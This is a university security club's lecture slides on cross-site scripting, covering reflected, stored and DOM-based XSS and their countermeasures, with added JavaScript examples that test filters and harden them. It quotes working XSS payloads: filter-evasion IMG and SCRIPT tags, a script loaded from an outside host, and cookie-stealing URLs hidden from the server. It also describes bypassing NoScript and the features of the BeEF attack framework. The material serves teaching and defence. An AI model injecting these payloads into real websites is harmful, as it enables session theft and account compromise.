Introduction to XSS attacks!
Lecturer: MOUGEY Camille
SecurIMAG
2011-10-06
WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.
¡¡_ (in)security we trust _!!!
Grenoble INP Ensimag
Summary
• Reflected & Persistent XSS • Principle • Counter-measure • Tools Related
• DOM based XSS/DOMXSS • Principle • Counter-measure
• DOMBased vs. Standard XSS
SecurIMAG - Introduction to XSS attacks - MOUGEY Camille - 2011-10-06
Intro
• Cross Site Scripting (XSS): malicious script injection
• XSS != CSRF
• Often underestimated
• Easy to find, hard to defeat: XSS on bank websites, Facebook, Google, …
• Constant evolution: standard functions are needed (PHP 5: filter_var())
Reflected & Persistent XSS
Reflected & Persistent XSS Explanation
• Reflected
  [Figure: "Reflected XSS / type 1 attack", reproduced from Fabien Duchene and Karim Hossen (LIG), 5MMSSI-1 Common vulnerabilities and attacks, 2011-2012, slide 49/77, citing IBM 2002]
• Demo
Reflected & Persistent XSS Explanation
• Persistent
Reflected & Persistent XSS Counter-Measure
• Seems easy, but easy to defeat
  • In real life: if(preg_match("#<script#is", urldecode($input))) die("FAIL");
  -> Safe?
Evasion examples from the XSS Cheat Sheet (http://ha.ckers.org/xss.html):
<IMG SRC="jav ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
<IMG SRC="jav	ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
<SCRIPT SRC=//ha.ckers.org/.j>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
Try ‘< script’ (with a space)
Reflected & Persistent XSS Counter-Measure
• Testing for XSS (blackBox):
• Identify Input
• Analyse HTML Code
• Testing for Stored XSS
• Replay browser frames/requests (from logs, …) with an instrumented browser
Reflected & Persistent XSS Counter-Measure
• Client side: SOP, NoScript
• Bypass method
  NoScript's default anti-XSS rule: ^http://([a-z]+)\.google\.(?:[a-z]{1,3}\.)?[a-z]+/(?:search|custom|\1)\?
  Try www.google.xss.com …
  v 1.6.9.2
  v 1.6.9.8: hold CTRL, and NoScript disappeared …
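As an added example (not from the slides, and not NoScript's code), the following JavaScript unit-tests the allow-list rule quoted above for the host confusion the slide points at: the rule is copied from the slide with "http://" restored, the tightened version is our own illustrative rewrite (NoScript's actual fix is not on the slide), and the test URLs are constructed.

```javascript
// Added example, not part of the SecurIMAG slides or of NoScript.
// The rule quoted on the slide: "any label . google . [optional 1-3 letter label .] any label /"
const SLIDE_RULE =
  /^http:\/\/([a-z]+)\.google\.(?:[a-z]{1,3}\.)?[a-z]+\/(?:search|custom|\1)\?/;

// Assumption (ours, illustrative): pin the registrable domain to an explicit
// list of Google top-level domains instead of "any short label, then any label".
const TIGHTENED_RULE =
  /^https?:\/\/([a-z]+)\.google\.(?:com|fr|de|co\.uk)\/(?:search|custom|\1)\?/;

// A URL matched by the rule is exempted from the anti-XSS filter.
function isExemptFromXssFilter(rule, url) {
  return rule.test(url);
}

// Constructed test URLs: two genuine Google searches and a look-alike host
// whose registrable domain is xss.com, not google.*.
const CASES = {
  genuine: 'http://www.google.com/search?q=ensimag',
  genuineFr: 'http://www.google.fr/search?q=ensimag',
  lookalike: 'http://www.google.xss.com/search?q=%3Cscript%3E',
};

// Returns {genuine: bool, genuineFr: bool, lookalike: bool} for a rule, so an
// over-broad allow-list shows up as lookalike === true.
function evaluate(rule) {
  return Object.fromEntries(
    Object.entries(CASES).map(([label, url]) => [label, isExemptFromXssFilter(rule, url)])
  );
}
```

Running evaluate(SLIDE_RULE) exempts all three URLs, because `(?:[a-z]{1,3}\.)?[a-z]+` happily consumes `xss.com`; evaluate(TIGHTENED_RULE) still exempts the two genuine hosts but not the look-alike. The general lesson for any allow-list regex on a URL is to anchor the registrable domain explicitly and keep a negative test case in the suite.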
Reflected & Persistent XSS Counter-Measure
• Server side: OWASP 8 rules
  • RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content
    & --> &amp;   < --> &lt;   > --> &gt;   " --> &quot;
• In general, never trust client input!
• Have you thought about ‘User-Agent’, ‘Referer’, ‘Accept-Language’, ‘Cookies’, …?
• HTTPOnly cookie flag
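As an added example (not from the slides), the following JavaScript puts the slide's blacklist idea (the preg_match("#<script#is", urldecode($input)) check) next to Rule #1 output escaping, and runs both over the evasion strings quoted on the earlier slide; the function names and the sample inputs are ours.

```javascript
// Added example, not part of the SecurIMAG slides.

// Slide-style blacklist: URL-decode, then refuse anything containing "<script".
// Returns true when the input is ACCEPTED by the filter.
function naiveBlacklist(input) {
  const decoded = decodeURIComponent(input);
  return !/<script/i.test(decoded);
}

// OWASP XSS Prevention Cheat Sheet, Rule #1: escape the characters that carry
// meaning in HTML element content (the slide lists & < > "; OWASP adds ' and /).
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function htmlEscape(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Crude tag detector used only to compare the two approaches: a "<" followed
// by optional whitespace and a letter is what a lenient parser turns into a tag.
function containsTag(html) {
  return /<\s*[a-z]/i.test(html);
}

// Constructed inputs, taken from the cheat-sheet lines quoted on the slides.
const SAMPLES = [
  'Fabien',
  '<script>alert(1)</script>',
  '< script>alert(1)</script>',                  // space after "<" slips past "#<script#"
  '<IMG SRC="jav\tascript:alert(\'XSS\');">',     // embedded tab splits "javascript", no "<script" at all
  '<SCRIPT SRC=//ha.ckers.org/.j>',
];

// For each sample: does the blacklist accept it, does accepted output still
// contain a tag, and does Rule #1 escaping leave any tag behind?
function compare(samples = SAMPLES) {
  return samples.map((s) => ({
    input: s,
    blacklistAccepts: naiveBlacklist(s),
    blacklistStillActive: naiveBlacklist(s) && containsTag(s),
    escapedStillActive: containsTag(htmlEscape(s)),
  }));
}
```

The comparison shows the asymmetry the slide is driving at: the blacklist is only ever as good as its list of bad strings (three of the five samples get through it with a live tag), whereas escaping is defined by what the output context allows and leaves no tag in any sample.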
Reflected & Persistent XSS Tools related
• Counter-Measure • Input/Output sanitization: HTMLPurifier
• Stored XSS Finder • Scrubbr • Some homemade script
• Ajax worms
• XSS Exploitation Framework • BeEF
BeEF
• Architecture
• Launch
• Hook
• And you get:
• BeEF notable features
  • Browser exploitation modules
  • Keystroke logging
  • Browser proxying
  • Integration with Metasploit via XML-RPC
  • Plugin detection
  • Intranet service exploitation
  • Tor detection
  • Browser functionality detection modules
• Demo!
DOM based XSS/DOMXSS
DOM Based XSS/DOMXSS/type-0 XSS
• DOM (Document Object Model)?
  <P ALIGN="right">This is a <B>paragraph</B></P>
  [Figure: DOM tree of this element: a P node with the attribute Align = "right", whose content is the text "This is a" followed by a B node containing "paragraph"]
DOM Based XSS/DOMXSS/type-0 XSS
• DOM Based XSS principle
  • Main idea: the web server does not receive the payload anymore!
  • Detection is usually focused on the server output
  [Figure: numbered diagram (steps 1 to 4) of the DOM based XSS flow]
DOMBased Example
• Classic example:
  <HTML>
  <TITLE>Welcome!</TITLE>
  Hi
  <SCRIPT>
  var pos=document.URL.indexOf("name=")+5;
  document.write(document.URL.substring(pos,document.URL.length));
  </SCRIPT>
  <BR>
  Welcome to our system …
  </HTML>
• Normal use: http://www.vulnerable.site/welcome.html?name=Fabien
• What about: http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>
• Does the server see the payload? Use # (the fragment is never sent to the server), or hide it in another parameter: a server-side check on name sees only Fabien, while indexOf("name=") picks up the first occurrence:
  http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)</script>&name=Fabien
DOMBased Counter-Measure
• Traditional methods
  • HTML encoding output data at the server side
  • Removing/encoding offending input data at the server side
  • Don’t work well on DOM based XSS!
• 3 main rules
  • Avoid client side document-sensitive actions that use client side data. Prefer dynamic pages!
  • Analyze and harden the client side (Javascript) code
  • Use a very strict IPS policy (avoid evasion techniques like double attribute)
DOMBased Counter-Measure Back to the Example
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]+$/)) {   // "+" added: the slide's /^[a-zA-Z0-9]$/ only ever accepts a one-character name
  document.write(name);
} else {
  window.alert("Security error");
}
</SCRIPT>
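As an added example (ours, not the slides' or the webappsec article's code), the welcome page's name handling is rewritten below as plain functions so the vulnerable and the hardened behaviour can be checked outside a browser: the insecure extractor is the slide's indexOf/substring logic, the secure one parses the query string with the standard URL API and renders through a text node instead of document.write. The test URLs are the ones from the slides, constructed here; renderIntoDom assumes a browser document.

```javascript
// Added example, not part of the SecurIMAG slides.

// Vulnerable extraction as on the slide: scan the WHOLE URL for "name=" and
// take everything after it, fragment included, first occurrence wins.
function extractNameInsecure(url) {
  const pos = url.indexOf('name=') + 5;
  return url.substring(pos, url.length);
}

// Hardened extraction: parse the query string properly. The fragment (#...)
// is never part of searchParams, and a "name=" buried inside another
// parameter's value is not mistaken for the name parameter.
function extractNameSecure(url) {
  return new URL(url).searchParams.get('name') || '';
}

// Slide regex with the missing quantifier restored; without "+" it only ever
// accepts a one-character name, so "Fabien" would be rejected.
const NAME_RE = /^[a-zA-Z0-9]+$/;

// Returns the text the page would show. Validation happens on the parsed
// parameter, not on the raw URL.
function renderGreeting(url) {
  const name = extractNameSecure(url);
  if (!NAME_RE.test(name)) return 'Security error';
  return 'Hi ' + name;
}

// DOM sink as it would be done in the page (assumes a browser `document`):
// textContent, never innerHTML or document.write, so the value cannot be
// parsed as markup even if the allow-list is later relaxed.
function renderIntoDom(doc, url) {
  const span = doc.createElement('span');
  span.textContent = renderGreeting(url);
  return span;
}

// Constructed URLs mirroring the slides.
const BASE = 'http://www.vulnerable.site/welcome.html';
const URLS = {
  normal: BASE + '?name=Fabien',
  query: BASE + '?name=<script>alert(document.cookie)</script>',
  fragment: BASE + '#name=<script>alert(document.cookie)</script>',
  hidden: BASE + '?foobar=name=<script>alert(document.cookie)</script>&name=Fabien',
};
```

Against the "hidden" URL, extractNameInsecure returns the payload (indexOf stops at the name= inside foobar) while extractNameSecure returns "Fabien"; against the "#" URL the insecure extractor again returns the payload although the server never saw it, while searchParams is empty and the page falls back to the error branch.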
DOMBased vs. Standard XSS
DOMBased vs. Standard XSS
Root cause
  • Standard XSS: insecure embedding of client input in the HTML outbound page
  • DOM Based XSS: insecure reference and use (in client side code) of DOM objects that are not fully controlled by the server-provided page
Page nature
  • Standard XSS: dynamic ONLY
  • DOM Based XSS: typically static (HTML)
Vulnerability detection
  • Standard XSS: manual fault injection; automatic fault injection; code review (needs access to the page source)
  • DOM Based XSS: manual fault injection; code review (can be done remotely!)
Attack detection
  • Standard XSS: web server logs; online attack detection tools (IDS, IPS, web application firewalls)
  • DOM Based XSS: if evasion techniques are applicable and used, no server side detection is possible
Counter-measure
  • Standard XSS: data validation at the server side; attack prevention utilities/tools (IPS, application firewalls)
  • DOM Based XSS: data validation at the client side (in Javascript); alternative server side logic
Questions ?
Source / Bibliography
• Wikipedia: XSS, DOM
• Berkeley University: An Empirical Analysis of XSS Sanitization in Web Application Frameworks
• MISC n°49
• XSS Cheat Sheet: http://ha.ckers.org/xss.html
• DOMXSS Wiki: https://code.google.com/p/domxsswiki/wiki/Index
• DOM Based Cross Site Scripting or XSS of the Third Kind: http://www.webappsec.org/projects/articles/071105.shtml
• OWASP:
  • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)
  • Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)
  • Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)
  • Scrubbr
  • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• BeEF: http://beefproject.com/
• Ajax Worms: http://www.gnucitizen.org/blog/wormx/ ; http://en.wikipedia.org/wiki/Samy_(XSS)
• Mario Heiderich (HIP2k11): http://heideri.ch